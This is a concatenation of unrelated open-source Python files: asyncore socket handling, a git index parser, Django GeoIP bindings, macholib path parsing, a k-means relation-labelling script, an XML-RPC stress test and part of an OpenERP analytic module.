if err in (0, EISCONN):
self.addr = address
self.handle_connect_event()
else:
raise socket.error(err, errorcode[err])
def accept(self):
# XXX can return either an address pair or None
try:
conn, addr = self.socket.accept()
except TypeError:
return None
except socket.error as why:
if why.args[0] in (EWOULDBLOCK, ECONNABORTED, EAGAIN):
return None
else:
raise
else:
return conn, addr
def send(self, data):
try:
result = self.socket.send(data)
return result
except socket.error as why:
if why.args[0] == EWOULDBLOCK:
return 0
elif why.args[0] in _DISCONNECTED:
self.handle_close()
return 0
else:
raise
def recv(self, buffer_size):
try:
data = self.socket.recv(buffer_size)
if not data:
# a closed connection is indicated by signaling
# a read condition, and having recv() return 0.
self.handle_close()
return b''
else:
return data
except socket.error as why:
# winsock sometimes throws ENOTCONN
if why.args[0] in _DISCONNECTED:
self.handle_close()
return b''
else:
raise
def close(self):
self.connected = False
self.accepting = False
self.del_channel()
try:
self.socket.close()
except socket.error as why:
if why.args[0] not in (ENOTCONN, EBADF):
raise
# cheap inheritance, used to pass all other attribute
# references to the underlying socket object.
def __getattr__(self, attr):
try:
retattr = getattr(self.socket, attr)
except AttributeError:
raise AttributeError("%s instance has no attribute '%s'"
%(self.__class__.__name__, attr))
else:
msg = "%(me)s.%(attr)s is deprecated; use %(me)s.socket.%(attr)s " \
"instead" % {'me' : self.__class__.__name__, 'attr' : attr}
warnings.warn(msg, DeprecationWarning, stacklevel=2)
return retattr
# log and log_info may be overridden to provide more sophisticated
# logging and warning methods. In general, log is for 'hit' logging
# and 'log_info' is for informational, warning and error logging.
def log(self, message):
sys.stderr.write('log: %s\n' % str(message))
def log_info(self, message, type='info'):
if type not in self.ignore_log_types:
print('%s: %s' % (type, message))
def handle_read_event(self):
if self.accepting:
# accepting sockets are never connected, they "spawn" new
# sockets that are connected
self.handle_accept()
elif not self.connected:
self.handle_connect_event()
self.handle_read()
else:
self.handle_read()
def handle_connect_event(self):
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
raise socket.error(err, _strerror(err))
self.handle_connect()
self.connected = True
def handle_write_event(self):
if self.accepting:
# Accepting sockets shouldn't get a write event.
# We will pretend it didn't happen.
return
if not self.connected:
#check for errors
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
raise socket.error(err, _strerror(err))
self.handle_connect_event()
self.handle_write()
def handle_expt_event(self):
# handle_expt_event() is called if there might be an error on the
# socket, or if there is OOB data
# check for the error condition first
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
# we can get here when select.select() says that there is an
# exceptional condition on the socket
# since there is an error, we'll go ahead and close the socket
# like we would in a subclassed handle_read() that received no
# data
self.handle_close()
else:
self.handle_expt()
def handle_error(self):
nil, t, v, tbinfo = compact_traceback()
# sometimes a user repr method will crash.
try:
self_repr = repr(self)
except:
self_repr = '<__repr__(self) failed for object at %0x>' % id(self)
self.log_info(
'uncaptured python exception, closing channel %s (%s:%s %s)' % (
self_repr,
t,
v,
tbinfo
),
'error'
)
self.handle_close()
def handle_expt(self):
self.log_info('unhandled incoming priority event', 'warning')
def handle_read(self):
self.log_info('unhandled read event', 'warning')
def handle_write(self):
self.log_info('unhandled write event', 'warning')
def handle_connect(self):
self.log_info('unhandled connect event', 'warning')
def handle_accept(self):
pair = self.accept()
if pair is not None:
self.handle_accepted(*pair)
def handle_accepted(self, sock, addr):
sock.close()
self.log_info('unhandled accepted event', 'warning')
def handle_close(self):
self.log_info('unhandled close event', 'warning')
self.close()
# ---------------------------------------------------------------------------
# adds simple buffered output capability, useful for simple clients.
# [for more sophisticated usage use asynchat.async_chat]
# ---------------------------------------------------------------------------
class dispatcher_with_send(dispatcher):
def __init__(self, sock=None, map=None):
dispatcher.__init__(self, sock, map)
self.out_buffer = b''
def initiate_send(self):
num_sent = 0
num_sent = dispatcher.send(self, self.out_buffer[:512])
self.out_buffer = self.out_buffer[num_sent:]
def handle_write(self):
self.initiate_send()
def writable(self):
return (not self.connected) or len(self.out_buffer)
def send(self, data):
if self.debug:
self.log_info('sending %s' % repr(data))
self.out_buffer = self.out_buffer + data
self.initiate_send()
# ---------------------------------------------------------------------------
# used for debugging.
# ---------------------------------------------------------------------------
def compact_traceback():
t, v, tb = sys.exc_info()
tbinfo = []
if not tb: # Must have a traceback
raise AssertionError("traceback does not exist")
while tb:
tbinfo.append((
tb.tb_frame.f_code.co_filename,
tb.tb_frame.f_code.co_name,
str(tb.tb_lineno)
))
tb = tb.tb_next
# just to be safe
del tb
file, function, line = tbinfo[-1]
info = ' '.join(['[%s|%s|%s]' % x for x in tbinfo])
return (file, function, line), t, v, info
def close_all(map=None, ignore_all=False):
if map is None:
map = socket_map
for x in list(map.values()):
try:
x.close()
except OSError as x:
if x.args[0] == EBADF:
pass
elif not ignore_all:
raise
except _reraised_exceptions:
raise
except:
if not ignore_all:
raise
map.clear()
# Asynchronous File I/O:
#
# After a little research (reading man pages on various unixen, and
# digging through the linux kernel), I've determined that select()
# isn't meant for doing asynchronous file i/o.
# Heartening, though - reading linux/mm/filemap.c shows that linux
# supports asynchronous read-ahead. So _MOST_ of the time, the data
# will be sitting in memory for us already when we go to read it.
#
# What other OS's (besides NT) support async file i/o? [VMS?]
#
# Regardless, this is useful for pipes, and stdin/stdout...
if os.name == 'posix':
import fcntl
class file_wrapper:
# Here we override just enough to make a file
# look like a socket for the purposes of asyncore.
# The passed fd is automatically os.dup()'d
def __init__(self, fd):
self.fd = os.dup(fd)
def recv(self, *args):
return os.read(self.fd, *args)
def send(self, *args):
return os.write(self.fd, *args)
def getsockopt(self, level, optname, buflen=None):
if (level == socket.SOL_SOCKET and
optname == socket.SO_ERROR and
not buflen):
return 0
raise NotImplementedError("Only asyncore specific behaviour "
"implemented.")
read = recv
write = send
def close(self):
os.close(self.fd)
def fileno(self):
return self.fd
class file_dispatcher(dispatcher):
def __init__(self, fd, map=None):
dispatcher.__init__(self, None, map)
self.connected = True
try:
fd = fd.fileno()
except AttributeError:
pass
self.set_file(fd)
# set it to non-blocking mode
flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def set_file(self, fd):
self.socket = file_wrapper(fd)
self._fileno = self.socket.fileno()
self.add_channel()
|
calvin--/VCSRip
|
refs/heads/master
|
vcsrip/IndexParser.py
|
1
|
import struct
import binascii
def parse_index(index_file):
f = open(index_file, "rb")
def read(format):
format = "! " + format
bytes = f.read(struct.calcsize(format))
return struct.unpack(format, bytes)[0]
index = {}
entries = []
index["signature"] = f.read(4).decode("ascii")
index["version"] = read("I")
for e in range(read("I")):
entry = {}
f.seek(40, 1)
entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii")
entry["flags"] = read("H")
entry["extended"] = bool(entry["flags"] & (0b01000000 << 8))
namelen = entry["flags"] & 0xFFF
entry_length = 62
if entry["extended"] and (index["version"] == 3):
f.seek(2, 1)
entry_length += 2
if namelen < 0xFFF:
entry["name"] = f.read(namelen).decode("utf-8", "replace")
entry_length += namelen
else:
name = []
while True:
byte = f.read(1)
if byte == "\x00":
break
name.append(byte)
entry["name"] = b"".join(name).decode("utf-8", "replace")
entry_length += 1
padding = (8 - (entry_length % 8)) or 8
f.seek(padding, 1)
entries.append(
{
"name": entry["name"],
"sha1": entry["sha1"]
})
return entries
|
AnimeshSinha1309/Website-Edunet
|
refs/heads/master
|
WebsiteEdunet/env/Lib/site-packages/django/contrib/gis/geoip/prototypes.py
|
535
|
from ctypes import POINTER, Structure, c_char_p, c_float, c_int, string_at
from django.contrib.gis.geoip.libgeoip import free, lgeoip
# #### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
_fields_ = [('country_code', c_char_p),
('country_code3', c_char_p),
('country_name', c_char_p),
('region', c_char_p),
('city', c_char_p),
('postal_code', c_char_p),
('latitude', c_float),
('longitude', c_float),
# TODO: In 1.4.6 this changed from `int dma_code;` to
# `union {int metro_code; int dma_code;};`. Change
# to a `ctypes.Union` in to accommodate in future when
# pre-1.4.6 versions are no longer distributed.
('dma_code', c_int),
('area_code', c_int),
('charset', c_int),
('continent_code', c_char_p),
]
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
GEOIP_DEFAULT_ENCODING = 'iso-8859-1'
geoip_encodings = {
0: 'iso-8859-1',
1: 'utf8',
}
class GeoIPTag(Structure):
pass
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
# #### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
GeoIP_lib_version = lgeoip.GeoIP_lib_version
GeoIP_lib_version.argtypes = None
GeoIP_lib_version.restype = c_char_p
else:
GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
# For retrieving records by name or address.
def check_record(result, func, cargs):
if result:
# Checking the pointer to the C structure, if valid pull out elements
# into a dictionary.
rec = result.contents
record = {fld: getattr(rec, fld) for fld, ctype in rec._fields_}
# Now converting the strings to unicode using the proper encoding.
encoding = geoip_encodings[record['charset']]
for char_field in geoip_char_fields:
if record[char_field]:
record[char_field] = record[char_field].decode(encoding)
# Free the memory allocated for the struct & return.
GeoIPRecord_delete(result)
return record
else:
return None
def record_output(func):
func.argtypes = [DBTYPE, c_char_p]
func.restype = RECTYPE
func.errcheck = check_record
return func
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python.
class geoip_char_p(c_char_p):
pass
def check_string(result, func, cargs):
if result:
s = string_at(result)
free(result)
else:
s = ''
return s.decode(GEOIP_DEFAULT_ENCODING)
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
def _err_check(result, func, cargs):
if result:
return result.decode(GEOIP_DEFAULT_ENCODING)
return result
func.restype = c_char_p
func.errcheck = _err_check
return func
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
|
smkr/pyclipse
|
refs/heads/master
|
plugins/org.python.pydev/pysrc/third_party/wrapped_for_pydev/ctypes/macholib/framework.py
|
320
|
"""
Generic framework path manipulation
"""
import re
__all__ = ['framework_info']
STRICT_FRAMEWORK_RE = re.compile(r"""(?x)
(?P<location>^.*)(?:^|/)
(?P<name>
(?P<shortname>\w+).framework/
(?:Versions/(?P<version>[^/]+)/)?
(?P=shortname)
(?:_(?P<suffix>[^_]+))?
)$
""")
def framework_info(filename):
"""
A framework name can take one of the following four forms:
Location/Name.framework/Versions/SomeVersion/Name_Suffix
Location/Name.framework/Versions/SomeVersion/Name
Location/Name.framework/Name_Suffix
Location/Name.framework/Name
returns None if not found, or a mapping equivalent to:
dict(
location='Location',
name='Name.framework/Versions/SomeVersion/Name_Suffix',
shortname='Name',
version='SomeVersion',
suffix='Suffix',
)
Note that SomeVersion and Suffix are optional and may be None
if not present
"""
is_framework = STRICT_FRAMEWORK_RE.match(filename)
if not is_framework:
return None
return is_framework.groupdict()
def test_framework_info():
def d(location=None, name=None, shortname=None, version=None, suffix=None):
return dict(
location=location,
name=name,
shortname=shortname,
version=version,
suffix=suffix
)
assert framework_info('completely/invalid') is None
assert framework_info('completely/invalid/_debug') is None
assert framework_info('P/F.framework') is None
assert framework_info('P/F.framework/_debug') is None
assert framework_info('P/F.framework/F') == d('P', 'F.framework/F', 'F')
assert framework_info('P/F.framework/F_debug') == d('P', 'F.framework/F_debug', 'F', suffix='debug')
assert framework_info('P/F.framework/Versions') is None
assert framework_info('P/F.framework/Versions/A') is None
assert framework_info('P/F.framework/Versions/A/F') == d('P', 'F.framework/Versions/A/F', 'F', 'A')
assert framework_info('P/F.framework/Versions/A/F_debug') == d('P', 'F.framework/Versions/A/F_debug', 'F', 'A', 'debug')
if __name__ == '__main__':
test_framework_info()
|
windworship/kmeansds
|
refs/heads/master
|
clustered_ds.py
|
1
|
# -*- coding: utf-8 -*-
#
# Author: huang
#
'''
The implementation of the framework of combining kmeans with distant supervision
'''
import argparse
import logging
import time
import random
import collections
from sklearn.cluster import MiniBatchKMeans, Birch
from sklearn.feature_extraction import FeatureHasher
from sklearn.metrics.pairwise import euclidean_distances
NEG_RATIO = 0.05 # the ratio of subsample negatives
SUBSAMPLE = True # Subsample the cluster or not
class MentionDatum(object):
'''
The Class of Mention in the Datum
'''
ENTITY = {} # First entity of the entity pair
TYPE = {} # Type of first entity
NE = {} # Type of second entity
SLOT = {} # Second entity of the entity pair
RELATION = {} # Belonged Relation in DS
FEATURE = {}
FEATURE_APPEARENCE = []
# Class variable of the counts of values
entity_number = 0
type_number = 0
ne_number = 0
slot_number = 0
relation_number = 0
feature_number = 0
# Initialization for @property
_entity_id = None
_entity_type = None
_ne_type = None
_slot_value = None
_relation = []
_features = []
def __init__(self, args):
self.entity_id = args[0]
self.entity_type = args[1]
self.ne_type = args[2]
self.slot_value = args[3]
self.relation = args[4]
self.features = args[5:]
self.relabel_relation = []
@property
def entity_id(self):
return self._entity_id
@property
def entity_type(self):
return self._entity_type
@property
def ne_type(self):
return self._ne_type
@property
def slot_value(self):
return self._slot_value
@property
def relation(self):
return self._relation
@property
def features(self):
return self._features
@entity_id.setter
def entity_id(self, value):
if value not in MentionDatum.ENTITY:
MentionDatum.ENTITY[value] = self.entity_number
MentionDatum.entity_number += 1
self._entity_id = MentionDatum.ENTITY.get(value)
@entity_type.setter
def entity_type(self, value):
if value not in MentionDatum.TYPE:
MentionDatum.TYPE[value] = self.type_number
MentionDatum.type_number += 1
self._entity_type = MentionDatum.TYPE.get(value)
@ne_type.setter
def ne_type(self, value):
if value not in MentionDatum.NE:
MentionDatum.NE[value] = self.ne_number
MentionDatum.ne_number += 1
self._ne_type = MentionDatum.NE.get(value)
@slot_value.setter
def slot_value(self, value):
if value not in MentionDatum.SLOT:
MentionDatum.SLOT[value] = self.slot_number
MentionDatum.slot_number += 1
self._slot_value = MentionDatum.SLOT.get(value)
@relation.setter
def relation(self, value):
value = value.split('|')
reform_relation = []
for rel in value:
if rel not in MentionDatum.RELATION:
MentionDatum.RELATION[rel] = self.relation_number
MentionDatum.relation_number += 1
reform_relation.append(MentionDatum.RELATION.get(rel))
self._relation = reform_relation
@features.setter
def features(self, value):
reform_feature = []
for feature in value:
if feature not in MentionDatum.FEATURE:
MentionDatum.FEATURE[feature] = self.feature_number
MentionDatum.feature_number += 1
MentionDatum.FEATURE_APPEARENCE.append(0)
feature_index = MentionDatum.FEATURE.get(feature)
MentionDatum.FEATURE_APPEARENCE[feature_index] += 1
reform_feature.append(feature_index)
self._features = reform_feature
def __str__(self):
relation = self.relation if not self.relabel_relation else self.relabel_relation
mention_str =\
(
'{0} {1} {2} {3} {4} {5}'
).format(
MentionDatum.ENTITY.get(self.entity_id),
MentionDatum.TYPE.get(self.entity_type),
MentionDatum.NE.get(self.ne_type),
MentionDatum.SLOT.get(self.slot_value),
'|'.join([MentionDatum.RELATION.get(rel) for rel in relation]),
' '.join([MentionDatum.FEATURE.get(fea) for fea in self.features]),
)
return mention_str
@classmethod
def shrink_features(cls, threshold=5):
'''
Shrink the features whose appearence is less than the setting threshold.
'''
shrinked_index = 0
shrinked_feature = {}
cls.FEATURE_INDEX = {} # Regenerate index for shrinked feature space
for fea, index in cls.FEATURE.iteritems():
if cls.FEATURE_APPEARENCE[index] >= threshold:
shrinked_feature[fea] = index
cls.FEATURE_INDEX[index] = shrinked_index
shrinked_index += 1
shrinked_feature_number = cls.feature_number - shrinked_index
cls.feature_number = shrinked_index
cls.FEATURE_APPEARENCE = None
logging.info('[OK]...Feature Shrinking')
logging.info('---# of shrinked Features: {0}'.format(shrinked_feature_number))
def _feature_vector_generation(self):
'''
Generate the feature vector in the shrinked feature space.
'''
return dict(
[
(str(MentionDatum.FEATURE_INDEX[index]), 1)
for index in self.features
if index in MentionDatum.FEATURE_INDEX
]
)
@classmethod
def regenerate_feature(cls, mentions):
'''
Generate feature vectors for all relation mentions
'''
return [mention._feature_vector_generation() for mention in mentions]
@classmethod
def transpose_values(cls):
'''
Transpose all value dicts for the generation of datum files.
'''
cls.ENTITY = dict(
zip(cls.ENTITY.values(), cls.ENTITY.keys())
)
cls.TYPE = dict(zip(cls.TYPE.values(), cls.TYPE.keys()))
cls.NE = dict(zip(cls.NE.values(), cls.NE.keys()))
cls.SLOT = dict(zip(cls.SLOT.values(), cls.SLOT.keys()))
cls.RELATION = dict(
zip(cls.RELATION.values(), cls.RELATION.keys())
)
cls.FEATURE = dict(
zip(cls.FEATURE.values(), cls.FEATURE.keys())
)
def _subsample_negatives(mention):
'''
Subsample negatives from mention.
:type mention: MentionDatum
:rtype boolean
'''
nr = MentionDatum.RELATION.get('_NR', None)
if nr is not None\
and [nr] == mention.relation\
and random.uniform(0, 1) > NEG_RATIO:
return False
return True
def _read_datum_file(file_path):
'''
Load the datum from the datum file
:type file_path: basestring
:type neg_ratio: double in [0,1]
:rtype List[MentionDatum]
'''
mentions = []
with open(file_path) as f:
for line in f:
mention = MentionDatum(line.split())
if not _subsample_negatives(mention):
continue
mentions.append(mention)
logging.debug(
'---[OK]...Datum File {0} Loaded | {1} Mentions Loaded'.format(
file_path,
len(mentions),
)
)
return mentions
def datums_read(directory, number=88):
'''
Load datums from NUMBER of datum files in the DIRECTORY
:type directory: basestring
:type number: int in [0, # of datum file in the DIRECTORY]
:rtype List[MentionDatum]
'''
def _generate_file_path(index, generate_mode='{0}/kb_part-00{1:0>2d}.datums'):
'''
Generate the file path in the directory
'''
return generate_mode.format(directory, index)
start = time.clock()
loaded_mentions = []
for datum_number in xrange(number):
loaded_mentions += _read_datum_file(_generate_file_path(datum_number+1))
time_cost = time.clock() - start
logging.info(
(
'[OK]...All Datums Loaded\n'
'---Cost Time: {0} | Average Per File: {1}\n'
'---# of Loaded Mentions: {2}\n'
'---# of Loaded Entities: {3}\n'
'---# of Loaded Entity Types: {4}\n'
'---# of Loaded NE Types: {5}\n'
'---# of Loaded Slots: {6}\n'
'---# of Loaded Relations: {7}\n'
'---# of Loaded Features: {8}\n'
).format(
time_cost,
time_cost/number,
len(loaded_mentions),
MentionDatum.entity_number,
MentionDatum.type_number,
MentionDatum.ne_number,
MentionDatum.slot_number,
MentionDatum.relation_number,
MentionDatum.feature_number,
)
)
return loaded_mentions
def _generate_feature_space(mentions):
'''
Generate the features space.
---------------------------------
:type mentions: List[MentionDatum]
:rtype: numpy.ndarray
'''
start = time.clock()
# Shrink the features
MentionDatum.shrink_features(threshold=5)
# Regenerate feature vectors
feature_space = MentionDatum.regenerate_feature(mentions)
# Generate feature space
feature_space =\
FeatureHasher(
n_features=MentionDatum.feature_number
).transform(feature_space)
time_cost = time.clock() - start
logging.info('[OK]...Generate Feature Space in {0}s'.format(time_cost))
return feature_space
def _minibatchkmeans(feature_space, cluster_number):
'''
Use MinibatchKkmeans to divide the feature_space into cluster_number bags.
-------------------------------------------------------------------------
:type feature_space: numpy.ndarray
:type cluster_number: int
:rtype: numpy.ndarray[n_mentions,] labels of the mentions
'''
start = time.clock()
model =\
MiniBatchKMeans(
n_clusters=cluster_number,
n_init=22,
batch_size=5700
)
predicts = model.fit_predict(feature_space)
logging.info('[OK]...Kmeans Clustering | Cost {0}s'.format(time.clock()-start))
return predicts
def _predict_to_cluster(predicts, mentions):
'''
Transform predicts to clusters.
-------------------------------
:type predicts: numpy.ndarray[n_samples,]
:type mentions: List[MentionDatum]
:rtype: List[[int,]]
'''
cluster_number = len(set(predicts))
clusters = [[] for size in xrange(cluster_number)]
for index, predict in enumerate(predicts):
clusters[predict]+=mentions[index].relation
logging.info('------[OK]...Labels Transform To Clusters')
return clusters
def _assign_cluster_relation(predicts, mentions):
'''
Assign each cluster the most similar relation according to the assumption.
--------------------------------------------------------------------------
:type predicts: numpy.ndarray[n_samples,]
:type mentions: List[MentionDatum]
:rtype: List[(int, double)]
'''
start = time.clock()
relation_for_clusters = []
# Predicts -> clusters
clusters = _predict_to_cluster(predicts, mentions)
for cluster in clusters:
relation_counter = collections.Counter(cluster)
logging.info('---Cluster assign: {0}'.format(relation_counter))
assign_relation = relation_counter.most_common(1)[0]
relation_for_clusters.append(
(
assign_relation[0],
(assign_relation[1]+0.0)/len(cluster),
)
)
time_cost = time.clock() - start
logging.info('---[OK]...Assign cluster relations cost of {0}'.format(time_cost))
return relation_for_clusters
def _subsample_mention(predicts, clusters, mentions):
'''
Subsample mentions in a cluster based on the probability of the relation.
-------------------------------------------------------------------------
:type predicts: numpy.ndarray[n_samples,]
:type clusters: List[(int, double)]
:type mentions: List[MentionDatum]
:rtype: None
'''
start = time.clock()
subsample_number = 0
for index, predict in enumerate(predicts):
relation, probability = clusters[predict]
if not SUBSAMPLE or random.random() < probability:
mentions[index].relabel_relation.append(relation)
subsample_number += 1
time_cost = time.clock() - start
logging.info('---[OK]...Subsample mentions cost of {0}'.format(time_cost))
logging.info('------# of subsamples: {0}'.format(subsample_number))
def kmeans_predict(mentions, cluster_number=100):
'''
The framework predicts labels of mentions as following:
1. Generate the feature space
2. Kmeans divides the feature space into k clusters
3. Reassign each cluster a relation based on DS
4. Subsample mentions in the cluster to be labeled with corresponding relation
NOTE: Usually k is much higher than the # of known relations.
---------------------------------------------------
:type mentions:List[DatumMention]
:type cluster_number:int
:rtype None
'''
start = time.clock()
feature_space = _generate_feature_space(mentions)
predicts = _minibatchkmeans(feature_space, cluster_number)
relation_for_clusters = _assign_cluster_relation(predicts, mentions)
_generate_cluster(predicts, relation_for_clusters, mentions)
_subsample_mention(predicts, relation_for_clusters, mentions)
logging.info('[OK]...Framework | Cost {0}s'.format(time.clock()-start))
def regenerate_datums(mentions, filepath):
'''
Regenerate datums with the new relation
-------------------------------------------------
:type mentions: List[MentionDatum]
:type filepath: basestring
:rtype: None
'''
start = time.clock()
file_number = len(mentions) / 90000 + 1
negative_number = 0
nr = MentionDatum.RELATION.get('_NR')
#transpose values
MentionDatum.transpose_values()
for index in xrange(file_number):
with open(filepath + '/{0:0>2d}.datums'.format(index), 'w') as f:
for mention in mentions[index*90000:(index+1)*90000]:
if nr in mention.relabel_relation:
negative_number += 1
f.write(str(mention))
f.write('\n')
logging.debug('---[OK]...Generate {0:0>2d}.datums'.format(index))
spend = time.clock() - start
logging.info('[OK]...Generate {0} Datums File'.format(file_number))
logging.info('[OK]...Negative number: {0}'.format(negative_number))
logging.info('---Cost time: {0} | Average per file: {1}'.format(spend, spend/file_number))
def _generate_cluster(predicts, clusters, mentions):
'''
Generate clusters from predicts.
=======================================
:type predicts: numpy.ndarray[n_samples,]
:type clusters: List[(int, double)]
:type mentions: List[MentionDatum]
:rtype: None
'''
entity_index = dict(
zip(MentionDatum.ENTITY.values(), MentionDatum.ENTITY.keys())
)
slot_index = dict(
zip(MentionDatum.SLOT.values(), MentionDatum.SLOT.keys())
)
relation_index = dict(
zip(MentionDatum.RELATION.values(), MentionDatum.RELATION.keys())
)
cluster_results = [[] for index in xrange(100)]
for index, predict in enumerate(predicts):
relation, probability = clusters[predict]
cluster_results[predict].append(
(
entity_index[mentions[index].entity_id],
slot_index[mentions[index].slot_value],
relation_index[mentions[index].relation[0]],
relation_index[relation],
)
)
for index, cluster_result in enumerate(cluster_results):
with open('result/'+str(index), 'w') as f:
f.write('\n'.join([str(result) for result in cluster_result]))
with open('result/index', 'w') as f:
f.write('\n'.join([str(index) for index in sorted(enumerate(clusters), key=lambda x:x[1][1])]))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('METHOD START')
parser = argparse.ArgumentParser()
parser.add_argument('-n', type=int)
parser.add_argument('-r', type=float)
parser.add_argument('-o', type=str)
parser.add_argument('-d', type=str)
parser.add_argument('-s', type=bool)
parser.add_argument('-f', type=int)
args = parser.parse_args()
start = time.clock()
cluster_number = args.n
NEG_RATIO = (args.r + 0.0) / 100
SUBSAMPLE = True if args.s else False
logging.info('CLUSTER NUMBER:{0}'.format(cluster_number))
logging.info('NEG_RATIO:{0}'.format(NEG_RATIO))
logging.info('OUTPUT_DIR:{0}'.format(args.o))
logging.info('DATA_DIR:{0}'.format(args.d))
logging.info('SUBSAMPLE:{0}'.format(SUBSAMPLE))
mentions = datums_read(args.d, number=args.f)
kmeans_predict(mentions, cluster_number)
regenerate_datums(
mentions,
args.o,
)
logging.info('Method End With {0}s'.format(time.clock()-start))
|
maxtaco/okws
|
refs/heads/master
|
test/system/xmlxlate/py/stress.py
|
5
|
import xmlrpclib
import sys
class RpcConst:
def __init__ (self):
pass
def set (self, lst):
setattr (self, lst[0], lst[1])
def setall (self, lst):
for p in lst:
self.set (p)
if len (sys.argv) == 2:
host = sys.argv[1]
else:
host = "0.0.0.0:8081"
server_url = "http://" + host + "/xlater"
server = xmlrpclib.Server (server_url)
#server.system.setDebugLevel (4)
C = RpcConst ()
C.setall (server.xdr.constants ( [ "tstprot"] ) )
for i in range(0,10000):
ull = 2**61 * 7 + 44
ll = 0 - (2**62 + 33)
res = server.xdr.xlate (
{ "hostname" : "127.0.0.1",
"port" : 4000,
"program" : "tst_prog_1",
"procno" : C.TST_RPC4,
"arg" : { "x" : "ui4:" + str (8484848),
"y" : "i8:" + str (ll),
"z" : "ui8:"+ str (ull)
}
} )
ull_post = long(res['z'][4:])
ll_post = long (res['y'][3:])
if ull != ull_post:
raise ValueError, "RPC problem translating u_int64_t; " + \
"got %x, expected %x" % (ull_post, ull)
if ll != ll_post:
raise ValueError, "RPC problem translating int64_t; " + \
"got %d, expected %d" % (ll_post, ll)
|
eezee-it/server-tools
|
refs/heads/8.0
|
base_user_gravatar/models/__init__.py
|
44
|
# -*- coding: utf-8 -*-
# © 2015 Endika Iglesias
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import res_users
|
credativUK/OCB
|
refs/heads/7.0-local
|
addons/account_analytic_default/account_analytic_default.py
|
43
|
# -*- coding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_analytic_default(osv.osv):
_name = "account.analytic.default"
_description = "Analytic Distribution"
_rec_name = "analytic_id"
_order = "sequence"
_columns = {
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of analytic distribution"),
'analytic_id': fields.many2one('account.analytic.account', 'Analytic Account'),
'product_id': fields.many2one('product.product', 'Product', ondelete='cascade', help="Select a product which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this product, it will automatically take this as an analytic account)"),
'partner_id': fields.many2one('res.partner', 'Partner', ondelete='cascade', help="Select a partner which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this partner, it will automatically take this as an analytic account)"),
'user_id': fields.many2one('res.users', 'User', ondelete='cascade', help="Select a user which will use analytic account specified in analytic default."),
'company_id': fields.many2one('res.company', 'Company', ondelete='cascade', help="Select a company which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this company, it will automatically take this as an analytic account)"),
'date_start': fields.date('Start Date', help="Default start date for this Analytic Account."),
'date_stop': fields.date('End Date', help="Default end date for this Analytic Account."),
}
def account_get(self, cr, uid, product_id=None, partner_id=None, user_id=None, date=None, context=None):
domain = []
if product_id:
domain += ['|', ('product_id', '=', product_id)]
domain += [('product_id','=', False)]
if partner_id:
domain += ['|', ('partner_id', '=', partner_id)]
domain += [('partner_id', '=', False)]
if user_id:
domain += ['|',('user_id', '=', user_id)]
domain += [('user_id','=', False)]
if date:
domain += ['|', ('date_start', '<=', date), ('date_start', '=', False)]
domain += ['|', ('date_stop', '>=', date), ('date_stop', '=', False)]
best_index = -1
res = False
for rec in self.browse(cr, uid, self.search(cr, uid, domain, context=context), context=context):
index = 0
if rec.product_id: index += 1
if rec.partner_id: index += 1
if rec.user_id: index += 1
if rec.date_start: index += 1
if rec.date_stop: index += 1
if index > best_index:
res = rec
best_index = index
return res
account_analytic_default()
class account_invoice_line(osv.osv):
_inherit = "account.invoice.line"
_description = "Invoice Line"
def product_id_change(self, cr, uid, ids, product, uom_id, qty=0, name='', type='out_invoice', partner_id=False, fposition_id=False, price_unit=False, currency_id=False, context=None, company_id=None):
res_prod = super(account_invoice_line, self).product_id_change(cr, uid, ids, product, uom_id, qty, name, type, partner_id, fposition_id, price_unit, currency_id=currency_id, context=context, company_id=company_id)
rec = self.pool.get('account.analytic.default').account_get(cr, uid, product, partner_id, uid, time.strftime('%Y-%m-%d'), context=context)
if rec:
res_prod['value'].update({'account_analytic_id': rec.analytic_id.id})
else:
